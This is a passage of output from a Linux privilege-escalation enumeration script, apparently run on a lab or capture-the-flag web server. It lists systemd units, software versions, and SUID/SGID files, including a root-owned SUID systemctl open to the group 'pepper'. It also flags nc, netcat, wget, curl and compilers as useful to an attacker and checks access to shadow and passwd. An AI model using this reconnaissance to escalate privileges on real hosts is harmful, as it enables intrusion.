-rwxr-xr-x  1 root root  15K Feb 17  2019 systemd-update-utmp
-rwxr-xr-x  1 root root  11K Feb 17  2019 systemd-user-sessions
drwxr-xr-x  2 root root 4.0K Jan 15  2019 system-shutdown

/lib/systemd/system:
total 724K
-rw-r--r-- 1 root root  225 Mar  4  2019 sqli-defender.service
drwxr-xr-x 2 root root 4.0K Mar  2  2019 mariadb@bootstrap.service.d
drwxr-xr-x 2 root root 4.0K Mar  2  2019 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Mar  2  2019 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Mar  2  2019 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Mar  2  2019 getty.target.wants
drwxr-xr-x 2 root root 4.0K Mar  2  2019 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Mar  2  2019 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Mar  2  2019 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Mar  2  2019 timers.target.wants
drwxr-xr-x 2 root root 4.0K Mar  2  2019 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Mar  2  2019 systemd-resolved.service.d
drwxr-xr-x 2 root root 4.0K Mar  2  2019 systemd-timesyncd.service.d
-rw-r--r-- 1 root root  445 Mar  1  2019 ssh.service
-rw-r--r-- 1 root root  216 Mar  1  2019 ssh.socket
-rw-r--r-- 1 root root  196 Mar  1  2019 ssh@.service
-rw-r--r-- 1 root root  326 Feb 25  2019 php7.0-fpm.service
lrwxrwxrwx 1 root root   14 Feb 17  2019 autovt@.service -> getty@.service
-rw-r--r-- 1 root root  879 Feb 17  2019 basic.target
-rw-r--r-- 1 root root  379 Feb 17  2019 bluetooth.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 bootmisc.service -> /dev/null
-rw-r--r-- 1 root root  358 Feb 17  2019 busnames.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 checkroot.service -> /dev/null
-rw-r--r-- 1 root root  770 Feb 17  2019 console-getty.service
-rw-r--r-- 1 root root  791 Feb 17  2019 container-getty@.service
lrwxrwxrwx 1 root root    9 Feb 17  2019 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 cryptdisks.service -> /dev/null
-rw-r--r-- 1 root root  394 Feb 17  2019 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 Feb 17  2019 cryptsetup.target
lrwxrwxrwx 1 root root   13 Feb 17  2019 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Feb 17  2019 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Feb 17  2019 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Feb 17  2019 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 Feb 17  2019 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root   24 Feb 17  2019 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root   25 Feb 17  2019 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r--r-- 1 root root 1010 Feb 17  2019 debug-shell.service
lrwxrwxrwx 1 root root   16 Feb 17  2019 default.target -> graphical.target
-rw-r--r-- 1 root root  709 Feb 17  2019 dev-hugepages.mount
-rw-r--r-- 1 root root  624 Feb 17  2019 dev-mqueue.mount
-rw-r--r-- 1 root root 1.1K Feb 17  2019 emergency.service
-rw-r--r-- 1 root root  431 Feb 17  2019 emergency.target
-rw-r--r-- 1 root root  501 Feb 17  2019 exit.target
-rw-r--r-- 1 root root  440 Feb 17  2019 final.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 fuse.service -> /dev/null
-rw-r--r-- 1 root root  342 Feb 17  2019 getty-static.service
-rw-r--r-- 1 root root  460 Feb 17  2019 getty.target
-rw-r--r-- 1 root root 1.7K Feb 17  2019 getty@.service
-rw-r--r-- 1 root root  558 Feb 17  2019 graphical.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 halt.service -> /dev/null
-rw-r--r-- 1 root root  487 Feb 17  2019 halt.target
-rw-r--r-- 1 root root  447 Feb 17  2019 hibernate.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 hwclock.service -> /dev/null
-rw-r--r-- 1 root root  468 Feb 17  2019 hybrid-sleep.target
-rw-r--r-- 1 root root  630 Feb 17  2019 initrd-cleanup.service
-rw-r--r-- 1 root root  553 Feb 17  2019 initrd-fs.target
-rw-r--r-- 1 root root  790 Feb 17  2019 initrd-parse-etc.service
-rw-r--r-- 1 root root  521 Feb 17  2019 initrd-root-device.target
-rw-r--r-- 1 root root  526 Feb 17  2019 initrd-root-fs.target
-rw-r--r-- 1 root root  640 Feb 17  2019 initrd-switch-root.service
-rw-r--r-- 1 root root  714 Feb 17  2019 initrd-switch-root.target
-rw-r--r-- 1 root root  664 Feb 17  2019 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  723 Feb 17  2019 initrd.target
-rw-r--r-- 1 root root  501 Feb 17  2019 kexec.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 killprocs.service -> /dev/null
-rw-r--r-- 1 root root  677 Feb 17  2019 kmod-static-nodes.service
lrwxrwxrwx 1 root root   28 Feb 17  2019 kmod.service -> systemd-modules-load.service
-rw-r--r-- 1 root root  395 Feb 17  2019 local-fs-pre.target
-rw-r--r-- 1 root root  507 Feb 17  2019 local-fs.target
-rw-r--r-- 1 root root  405 Feb 17  2019 machine.slice
lrwxrwxrwx 1 root root   28 Feb 17  2019 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Feb 17  2019 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 mountnfs.service -> /dev/null
-rw-r--r-- 1 root root  492 Feb 17  2019 multi-user.target
-rw-r--r-- 1 root root  464 Feb 17  2019 network-online.target
-rw-r--r-- 1 root root  461 Feb 17  2019 network-pre.target
-rw-r--r-- 1 root root  480 Feb 17  2019 network.target
-rw-r--r-- 1 root root  514 Feb 17  2019 nss-lookup.target
-rw-r--r-- 1 root root  473 Feb 17  2019 nss-user-lookup.target
-rw-r--r-- 1 root root  354 Feb 17  2019 paths.target
-rw-r--r-- 1 root root  552 Feb 17  2019 poweroff.target
-rw-r--r-- 1 root root  377 Feb 17  2019 printer.target
-rw-r--r-- 1 root root  693 Feb 17  2019 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 Feb 17  2019 proc-sys-fs-binfmt_misc.mount
lrwxrwxrwx 1 root root   22 Feb 17  2019 procps.service -> systemd-sysctl.service
-rw-r--r-- 1 root root  568 Feb 17  2019 quotaon.service
-rw-r--r-- 1 root root  628 Feb 17  2019 rc-local.service
lrwxrwxrwx 1 root root   16 Feb 17  2019 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Feb 17  2019 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 reboot.service -> /dev/null
-rw-r--r-- 1 root root  543 Feb 17  2019 reboot.target
-rw-r--r-- 1 root root  396 Feb 17  2019 remote-fs-pre.target
-rw-r--r-- 1 root root  482 Feb 17  2019 remote-fs.target
-rw-r--r-- 1 root root 1022 Feb 17  2019 rescue.service
-rw-r--r-- 1 root root  486 Feb 17  2019 rescue.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 rmnologin.service -> /dev/null
-rw-r--r-- 1 root root  500 Feb 17  2019 rpcbind.target
lrwxrwxrwx 1 root root   15 Feb 17  2019 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Feb 17  2019 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Feb 17  2019 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Feb 17  2019 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Feb 17  2019 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Feb 17  2019 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Feb 17  2019 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 sendsigs.service -> /dev/null
-rw-r--r-- 1 root root 1.1K Feb 17  2019 serial-getty@.service
-rw-r--r-- 1 root root  402 Feb 17  2019 shutdown.target
-rw-r--r-- 1 root root  362 Feb 17  2019 sigpwr.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 single.service -> /dev/null
-rw-r--r-- 1 root root  420 Feb 17  2019 sleep.target
-rw-r--r-- 1 root root  409 Feb 17  2019 slices.target
-rw-r--r-- 1 root root  380 Feb 17  2019 smartcard.target
-rw-r--r-- 1 root root  356 Feb 17  2019 sockets.target
-rw-r--r-- 1 root root  380 Feb 17  2019 sound.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 stop-bootlogd.service -> /dev/null
-rw-r--r-- 1 root root  441 Feb 17  2019 suspend.target
-rw-r--r-- 1 root root  353 Feb 17  2019 swap.target
-rw-r--r-- 1 root root  715 Feb 17  2019 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  719 Feb 17  2019 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 Feb 17  2019 sys-kernel-debug.mount
-rw-r--r-- 1 root root  518 Feb 17  2019 sysinit.target
-rw-r--r-- 1 root root 1.3K Feb 17  2019 syslog.socket
-rw-r--r-- 1 root root  585 Feb 17  2019 system-update.target
-rw-r--r-- 1 root root  436 Feb 17  2019 system.slice
-rw-r--r-- 1 root root  664 Feb 17  2019 systemd-ask-password-console.path
-rw-r--r-- 1 root root  653 Feb 17  2019 systemd-ask-password-console.service
-rw-r--r-- 1 root root  592 Feb 17  2019 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  681 Feb 17  2019 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  724 Feb 17  2019 systemd-backlight@.service
-rw-r--r-- 1 root root  959 Feb 17  2019 systemd-binfmt.service
-rw-r--r-- 1 root root  497 Feb 17  2019 systemd-exit.service
-rw-r--r-- 1 root root  674 Feb 17  2019 systemd-fsck-root.service
-rw-r--r-- 1 root root  675 Feb 17  2019 systemd-fsck@.service
-rw-r--r-- 1 root root  551 Feb 17  2019 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Feb 17  2019 systemd-fsckd.socket
-rw-r--r-- 1 root root  544 Feb 17  2019 systemd-halt.service
-rw-r--r-- 1 root root  631 Feb 17  2019 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  501 Feb 17  2019 systemd-hibernate.service
-rw-r--r-- 1 root root  930 Feb 17  2019 systemd-hostnamed.service
-rw-r--r-- 1 root root  778 Feb 17  2019 systemd-hwdb-update.service
-rw-r--r-- 1 root root  519 Feb 17  2019 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  480 Feb 17  2019 systemd-initctl.service
-rw-r--r-- 1 root root  524 Feb 17  2019 systemd-initctl.socket
-rw-r--r-- 1 root root  731 Feb 17  2019 systemd-journal-flush.service
-rw-r--r-- 1 root root  607 Feb 17  2019 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Feb 17  2019 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 1.5K Feb 17  2019 systemd-journald.service
-rw-r--r-- 1 root root  842 Feb 17  2019 systemd-journald.socket
-rw-r--r-- 1 root root  557 Feb 17  2019 systemd-kexec.service
-rw-r--r-- 1 root root  911 Feb 17  2019 systemd-localed.service
-rw-r--r-- 1 root root 1.4K Feb 17  2019 systemd-logind.service
-rw-r--r-- 1 root root  693 Feb 17  2019 systemd-machine-id-commit.service
-rw-r--r-- 1 root root  967 Feb 17  2019 systemd-modules-load.service
-rw-r--r-- 1 root root  685 Feb 17  2019 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.5K Feb 17  2019 systemd-networkd.service
-rw-r--r-- 1 root root  591 Feb 17  2019 systemd-networkd.socket
-rw-r--r-- 1 root root  553 Feb 17  2019 systemd-poweroff.service
-rw-r--r-- 1 root root  614 Feb 17  2019 systemd-quotacheck.service
-rw-r--r-- 1 root root  752 Feb 17  2019 systemd-random-seed.service
-rw-r--r-- 1 root root  548 Feb 17  2019 systemd-reboot.service
-rw-r--r-- 1 root root  757 Feb 17  2019 systemd-remount-fs.service
-rw-r--r-- 1 root root 1.5K Feb 17  2019 systemd-resolved.service
-rw-r--r-- 1 root root  696 Feb 17  2019 systemd-rfkill.service
-rw-r--r-- 1 root root  617 Feb 17  2019 systemd-rfkill.socket
-rw-r--r-- 1 root root  497 Feb 17  2019 systemd-suspend.service
-rw-r--r-- 1 root root  653 Feb 17  2019 systemd-sysctl.service
-rw-r--r-- 1 root root  868 Feb 17  2019 systemd-timedated.service
-rw-r--r-- 1 root root 1.3K Feb 17  2019 systemd-timesyncd.service
-rw-r--r-- 1 root root  598 Feb 17  2019 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  450 Feb 17  2019 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  703 Feb 17  2019 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  683 Feb 17  2019 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  823 Feb 17  2019 systemd-udev-settle.service
-rw-r--r-- 1 root root  743 Feb 17  2019 systemd-udev-trigger.service
-rw-r--r-- 1 root root  595 Feb 17  2019 systemd-udevd-control.socket
-rw-r--r-- 1 root root  570 Feb 17  2019 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  968 Feb 17  2019 systemd-udevd.service
-rw-r--r-- 1 root root  757 Feb 17  2019 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  754 Feb 17  2019 systemd-update-utmp.service
-rw-r--r-- 1 root root  588 Feb 17  2019 systemd-user-sessions.service
-rw-r--r-- 1 root root  395 Feb 17  2019 time-sync.target
-rw-r--r-- 1 root root  405 Feb 17  2019 timers.target
lrwxrwxrwx 1 root root   21 Feb 17  2019 udev.service -> systemd-udevd.service
-rw-r--r-- 1 root root  417 Feb 17  2019 umount.target
lrwxrwxrwx 1 root root    9 Feb 17  2019 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Feb 17  2019 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Feb 17  2019 urandom.service -> systemd-random-seed.service
-rw-r--r-- 1 root root  392 Feb 17  2019 user.slice
-rw-r--r-- 1 root root  548 Feb 17  2019 user@.service
lrwxrwxrwx 1 root root    9 Feb 17  2019 x11-common.service -> /dev/null
-rw-r--r-- 1 root root  238 Jan 18  2019 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Jan 18  2019 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  225 Jan 18  2019 apt-daily.service
-rw-r--r-- 1 root root  156 Jan 18  2019 apt-daily.timer
drwxr-xr-x 2 root root 4.0K Jan 15  2019 busnames.target.wants
drwxr-xr-x 2 root root 4.0K Jan 15  2019 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Jan 15  2019 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Jan 15  2019 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Jan 15  2019 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Jan 15  2019 runlevel5.target.wants
-rw-r--r-- 1 root root  528 Nov  3  2018 apache-htcacheclean.service
-rw-r--r-- 1 root root  537 Nov  3  2018 apache-htcacheclean@.service
-rw-r--r-- 1 root root  346 Nov  3  2018 apache2.service
-rw-r--r-- 1 root root  418 Nov  3  2018 apache2@.service
-rw-r--r-- 1 root root 4.5K Aug  8  2018 mariadb.service
-rw-r--r-- 1 root root 5.6K Aug  8  2018 mariadb@.service
-rw-r--r-- 1 root root  366 Mar  2  2018 dbus.service
-rw-r--r-- 1 root root  106 Mar  2  2018 dbus.socket
-rw-r--r-- 1 root root  251 Oct  7  2017 cron.service
-rw-r--r-- 1 root root  306 Jul 25  2017 open-vm-tools.service
-rw-r--r-- 1 root root  298 Jul 25  2017 vgauth.service
-rw-r--r-- 1 root root  272 Jun  5  2017 sudo.service
-rw-r--r-- 1 root root  290 Jan 18  2017 rsyslog.service
-rw-r--r-- 1 root root  552 Jan 10  2017 ifup@.service
-rw-r--r-- 1 root root  175 Jan  1  2017 phpsessionclean.service
-rw-r--r-- 1 root root  144 Jan  1  2017 phpsessionclean.timer
-rw-r--r-- 1 root root  735 Oct 19  2016 networking.service
-rw-r--r-- 1 root root  312 May 19  2016 console-setup.service
-rw-r--r-- 1 root root  287 May 18  2016 keyboard-setup.service
-rw-r--r-- 1 root root  188 Feb 24  2014 rsync.service

/lib/systemd/system/mariadb@bootstrap.service.d:
total 4.0K
-rw-r--r-- 1 root root 533 Aug  8  2018 use_galera_new_cluster.conf

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Feb 17  2019 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Feb 17  2019 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Feb 17  2019 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Feb 17  2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Feb 17  2019 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Mar  2  2018 dbus.service -> ../dbus.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Feb 17  2019 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Feb 17  2019 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Feb 17  2019 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Feb 17  2019 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Feb 17  2019 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Feb 17  2019 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Mar  2  2018 dbus.socket -> ../dbus.socket

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Feb 17  2019 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Feb 17  2019 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Feb 17  2019 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Feb 17  2019 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Feb 17  2019 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Feb 17  2019 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Feb 17  2019 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Feb 17  2019 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Feb 17  2019 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Feb 17  2019 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Feb 17  2019 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Feb 17  2019 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Feb 17  2019 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Feb 17  2019 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Feb 17  2019 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Feb 17  2019 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Feb 17  2019 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Feb 17  2019 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Feb 17  2019 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Feb 17  2019 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Feb 17  2019 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Feb 17  2019 systemd-update-utmp.service -> ../systemd-update-utmp.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Feb 17  2019 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Feb 17  2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Feb 17  2019 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Feb 17  2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Feb 17  2019 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Feb 17  2019 debian.conf

/lib/systemd/system/systemd-resolved.service.d:
total 4.0K
-rw-r--r-- 1 root root 551 Feb 17  2019 resolvconf.conf

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Feb 17  2019 disable-with-time-daemon.conf

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 May 15  2018 hdparm

/lib/systemd/network:
total 16K
-rw-r--r-- 1 root root 605 Feb 17  2019 80-container-host0.network
-rw-r--r-- 1 root root 678 Feb 17  2019 80-container-ve.network
-rw-r--r-- 1 root root 664 Feb 17  2019 80-container-vz.network
-rw-r--r-- 1 root root  80 Feb 17  2019 99-default.link

/lib/systemd/system-generators:
total 192K
-rwxr-xr-x 1 root root 23K Feb 17  2019 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 15K Feb 17  2019 systemd-debug-generator
-rwxr-xr-x 1 root root 31K Feb 17  2019 systemd-fstab-generator
-rwxr-xr-x 1 root root 15K Feb 17  2019 systemd-getty-generator
-rwxr-xr-x 1 root root 35K Feb 17  2019 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 11K Feb 17  2019 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 11K Feb 17  2019 systemd-rc-local-generator
-rwxr-xr-x 1 root root 11K Feb 17  2019 systemd-system-update-generator
-rwxr-xr-x 1 root root 31K Feb 17  2019 systemd-sysv-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 923 Feb 17  2019 90-systemd.preset

/lib/systemd/system-shutdown:
total 0


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] Sudo version:[00m
Sudo version 1.8.19p1


[00;31m[-] MYSQL version:[00m
mysql  Ver 15.1 Distrib 10.1.37-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2


[00;31m[-] Apache version:[00m
Server version: Apache/2.4.25 (Debian)
Server built:   2018-11-03T18:46:19


[00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[00;31m[-] Installed Apache modules:[00m
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 headers_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php7_module (shared)
 reqtimeout_module (shared)
 setenvif_module (shared)
 status_module (shared)


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl


[00;31m[-] Installed compilers:[00m
ii  g++                           4:6.3.0-4                      amd64        GNU C++ compiler
ii  g++-6                         6.3.0-18+deb9u1                amd64        GNU C++ compiler
ii  gcc                           4:6.3.0-4                      amd64        GNU C compiler
ii  gcc-6                         6.3.0-18+deb9u1                amd64        GNU C compiler


[00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1434 Mar  2  2019 /etc/passwd
-rw-r--r-- 1 root root 679 Mar  4  2019 /etc/group
-rw-r--r-- 1 root root 767 Mar  4  2016 /etc/profile
-rw-r----- 1 root shadow 959 Mar  5  2019 /etc/shadow


[00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 30800 Aug 21  2018 /bin/fusermount
-rwsr-xr-x 1 root root 44304 Mar  7  2018 /bin/mount
-rwsr-xr-x 1 root root 61240 Nov 10  2016 /bin/ping
-rwsr-x--- 1 root pepper 174520 Feb 17  2019 /bin/systemctl
-rwsr-xr-x 1 root root 31720 Mar  7  2018 /bin/umount
-rwsr-xr-x 1 root root 40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 40312 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40504 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 140944 Jun  5  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 50040 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 440728 Mar  1  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Mar  2  2018 /usr/lib/dbus-1.0/dbus-daemon-launch-helper


[00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root shadow 35592 May 27  2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root ssh 358624 Mar  1  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 40264 Oct  7  2017 /usr/bin/crontab
-rwxr-sr-x 1 root mail 19008 Jan 17  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71856 May 17  2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 27448 Mar  7  2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22808 May 17  2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 14768 Apr 12  2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root utmp 10232 Feb 18  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 552 May 27  2017 /etc/pam.conf
-rw-r--r-- 1 root root 973 Jan 31  2017 /etc/mke2fs.conf
-rw-r--r-- 1 root root 2981 Mar  2  2019 /etc/adduser.conf
-rw-r--r-- 1 root root 599 May  5  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 144 Mar  2  2019 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 57 Aug  7 08:14 /etc/resolv.conf
-rw-r--r-- 1 root root 2683 May 17  2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 2969 May 21  2017 /etc/debconf.conf
-rw-r--r-- 1 root root 4781 May 15  2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 1963 Jan 18  2017 /etc/rsyslog.conf
-rw-r--r-- 1 root root 34 Mar  2  2018 /etc/ld.so.conf
-rw-r--r-- 1 root root 280 Jul 26  2018 /etc/fuse.conf
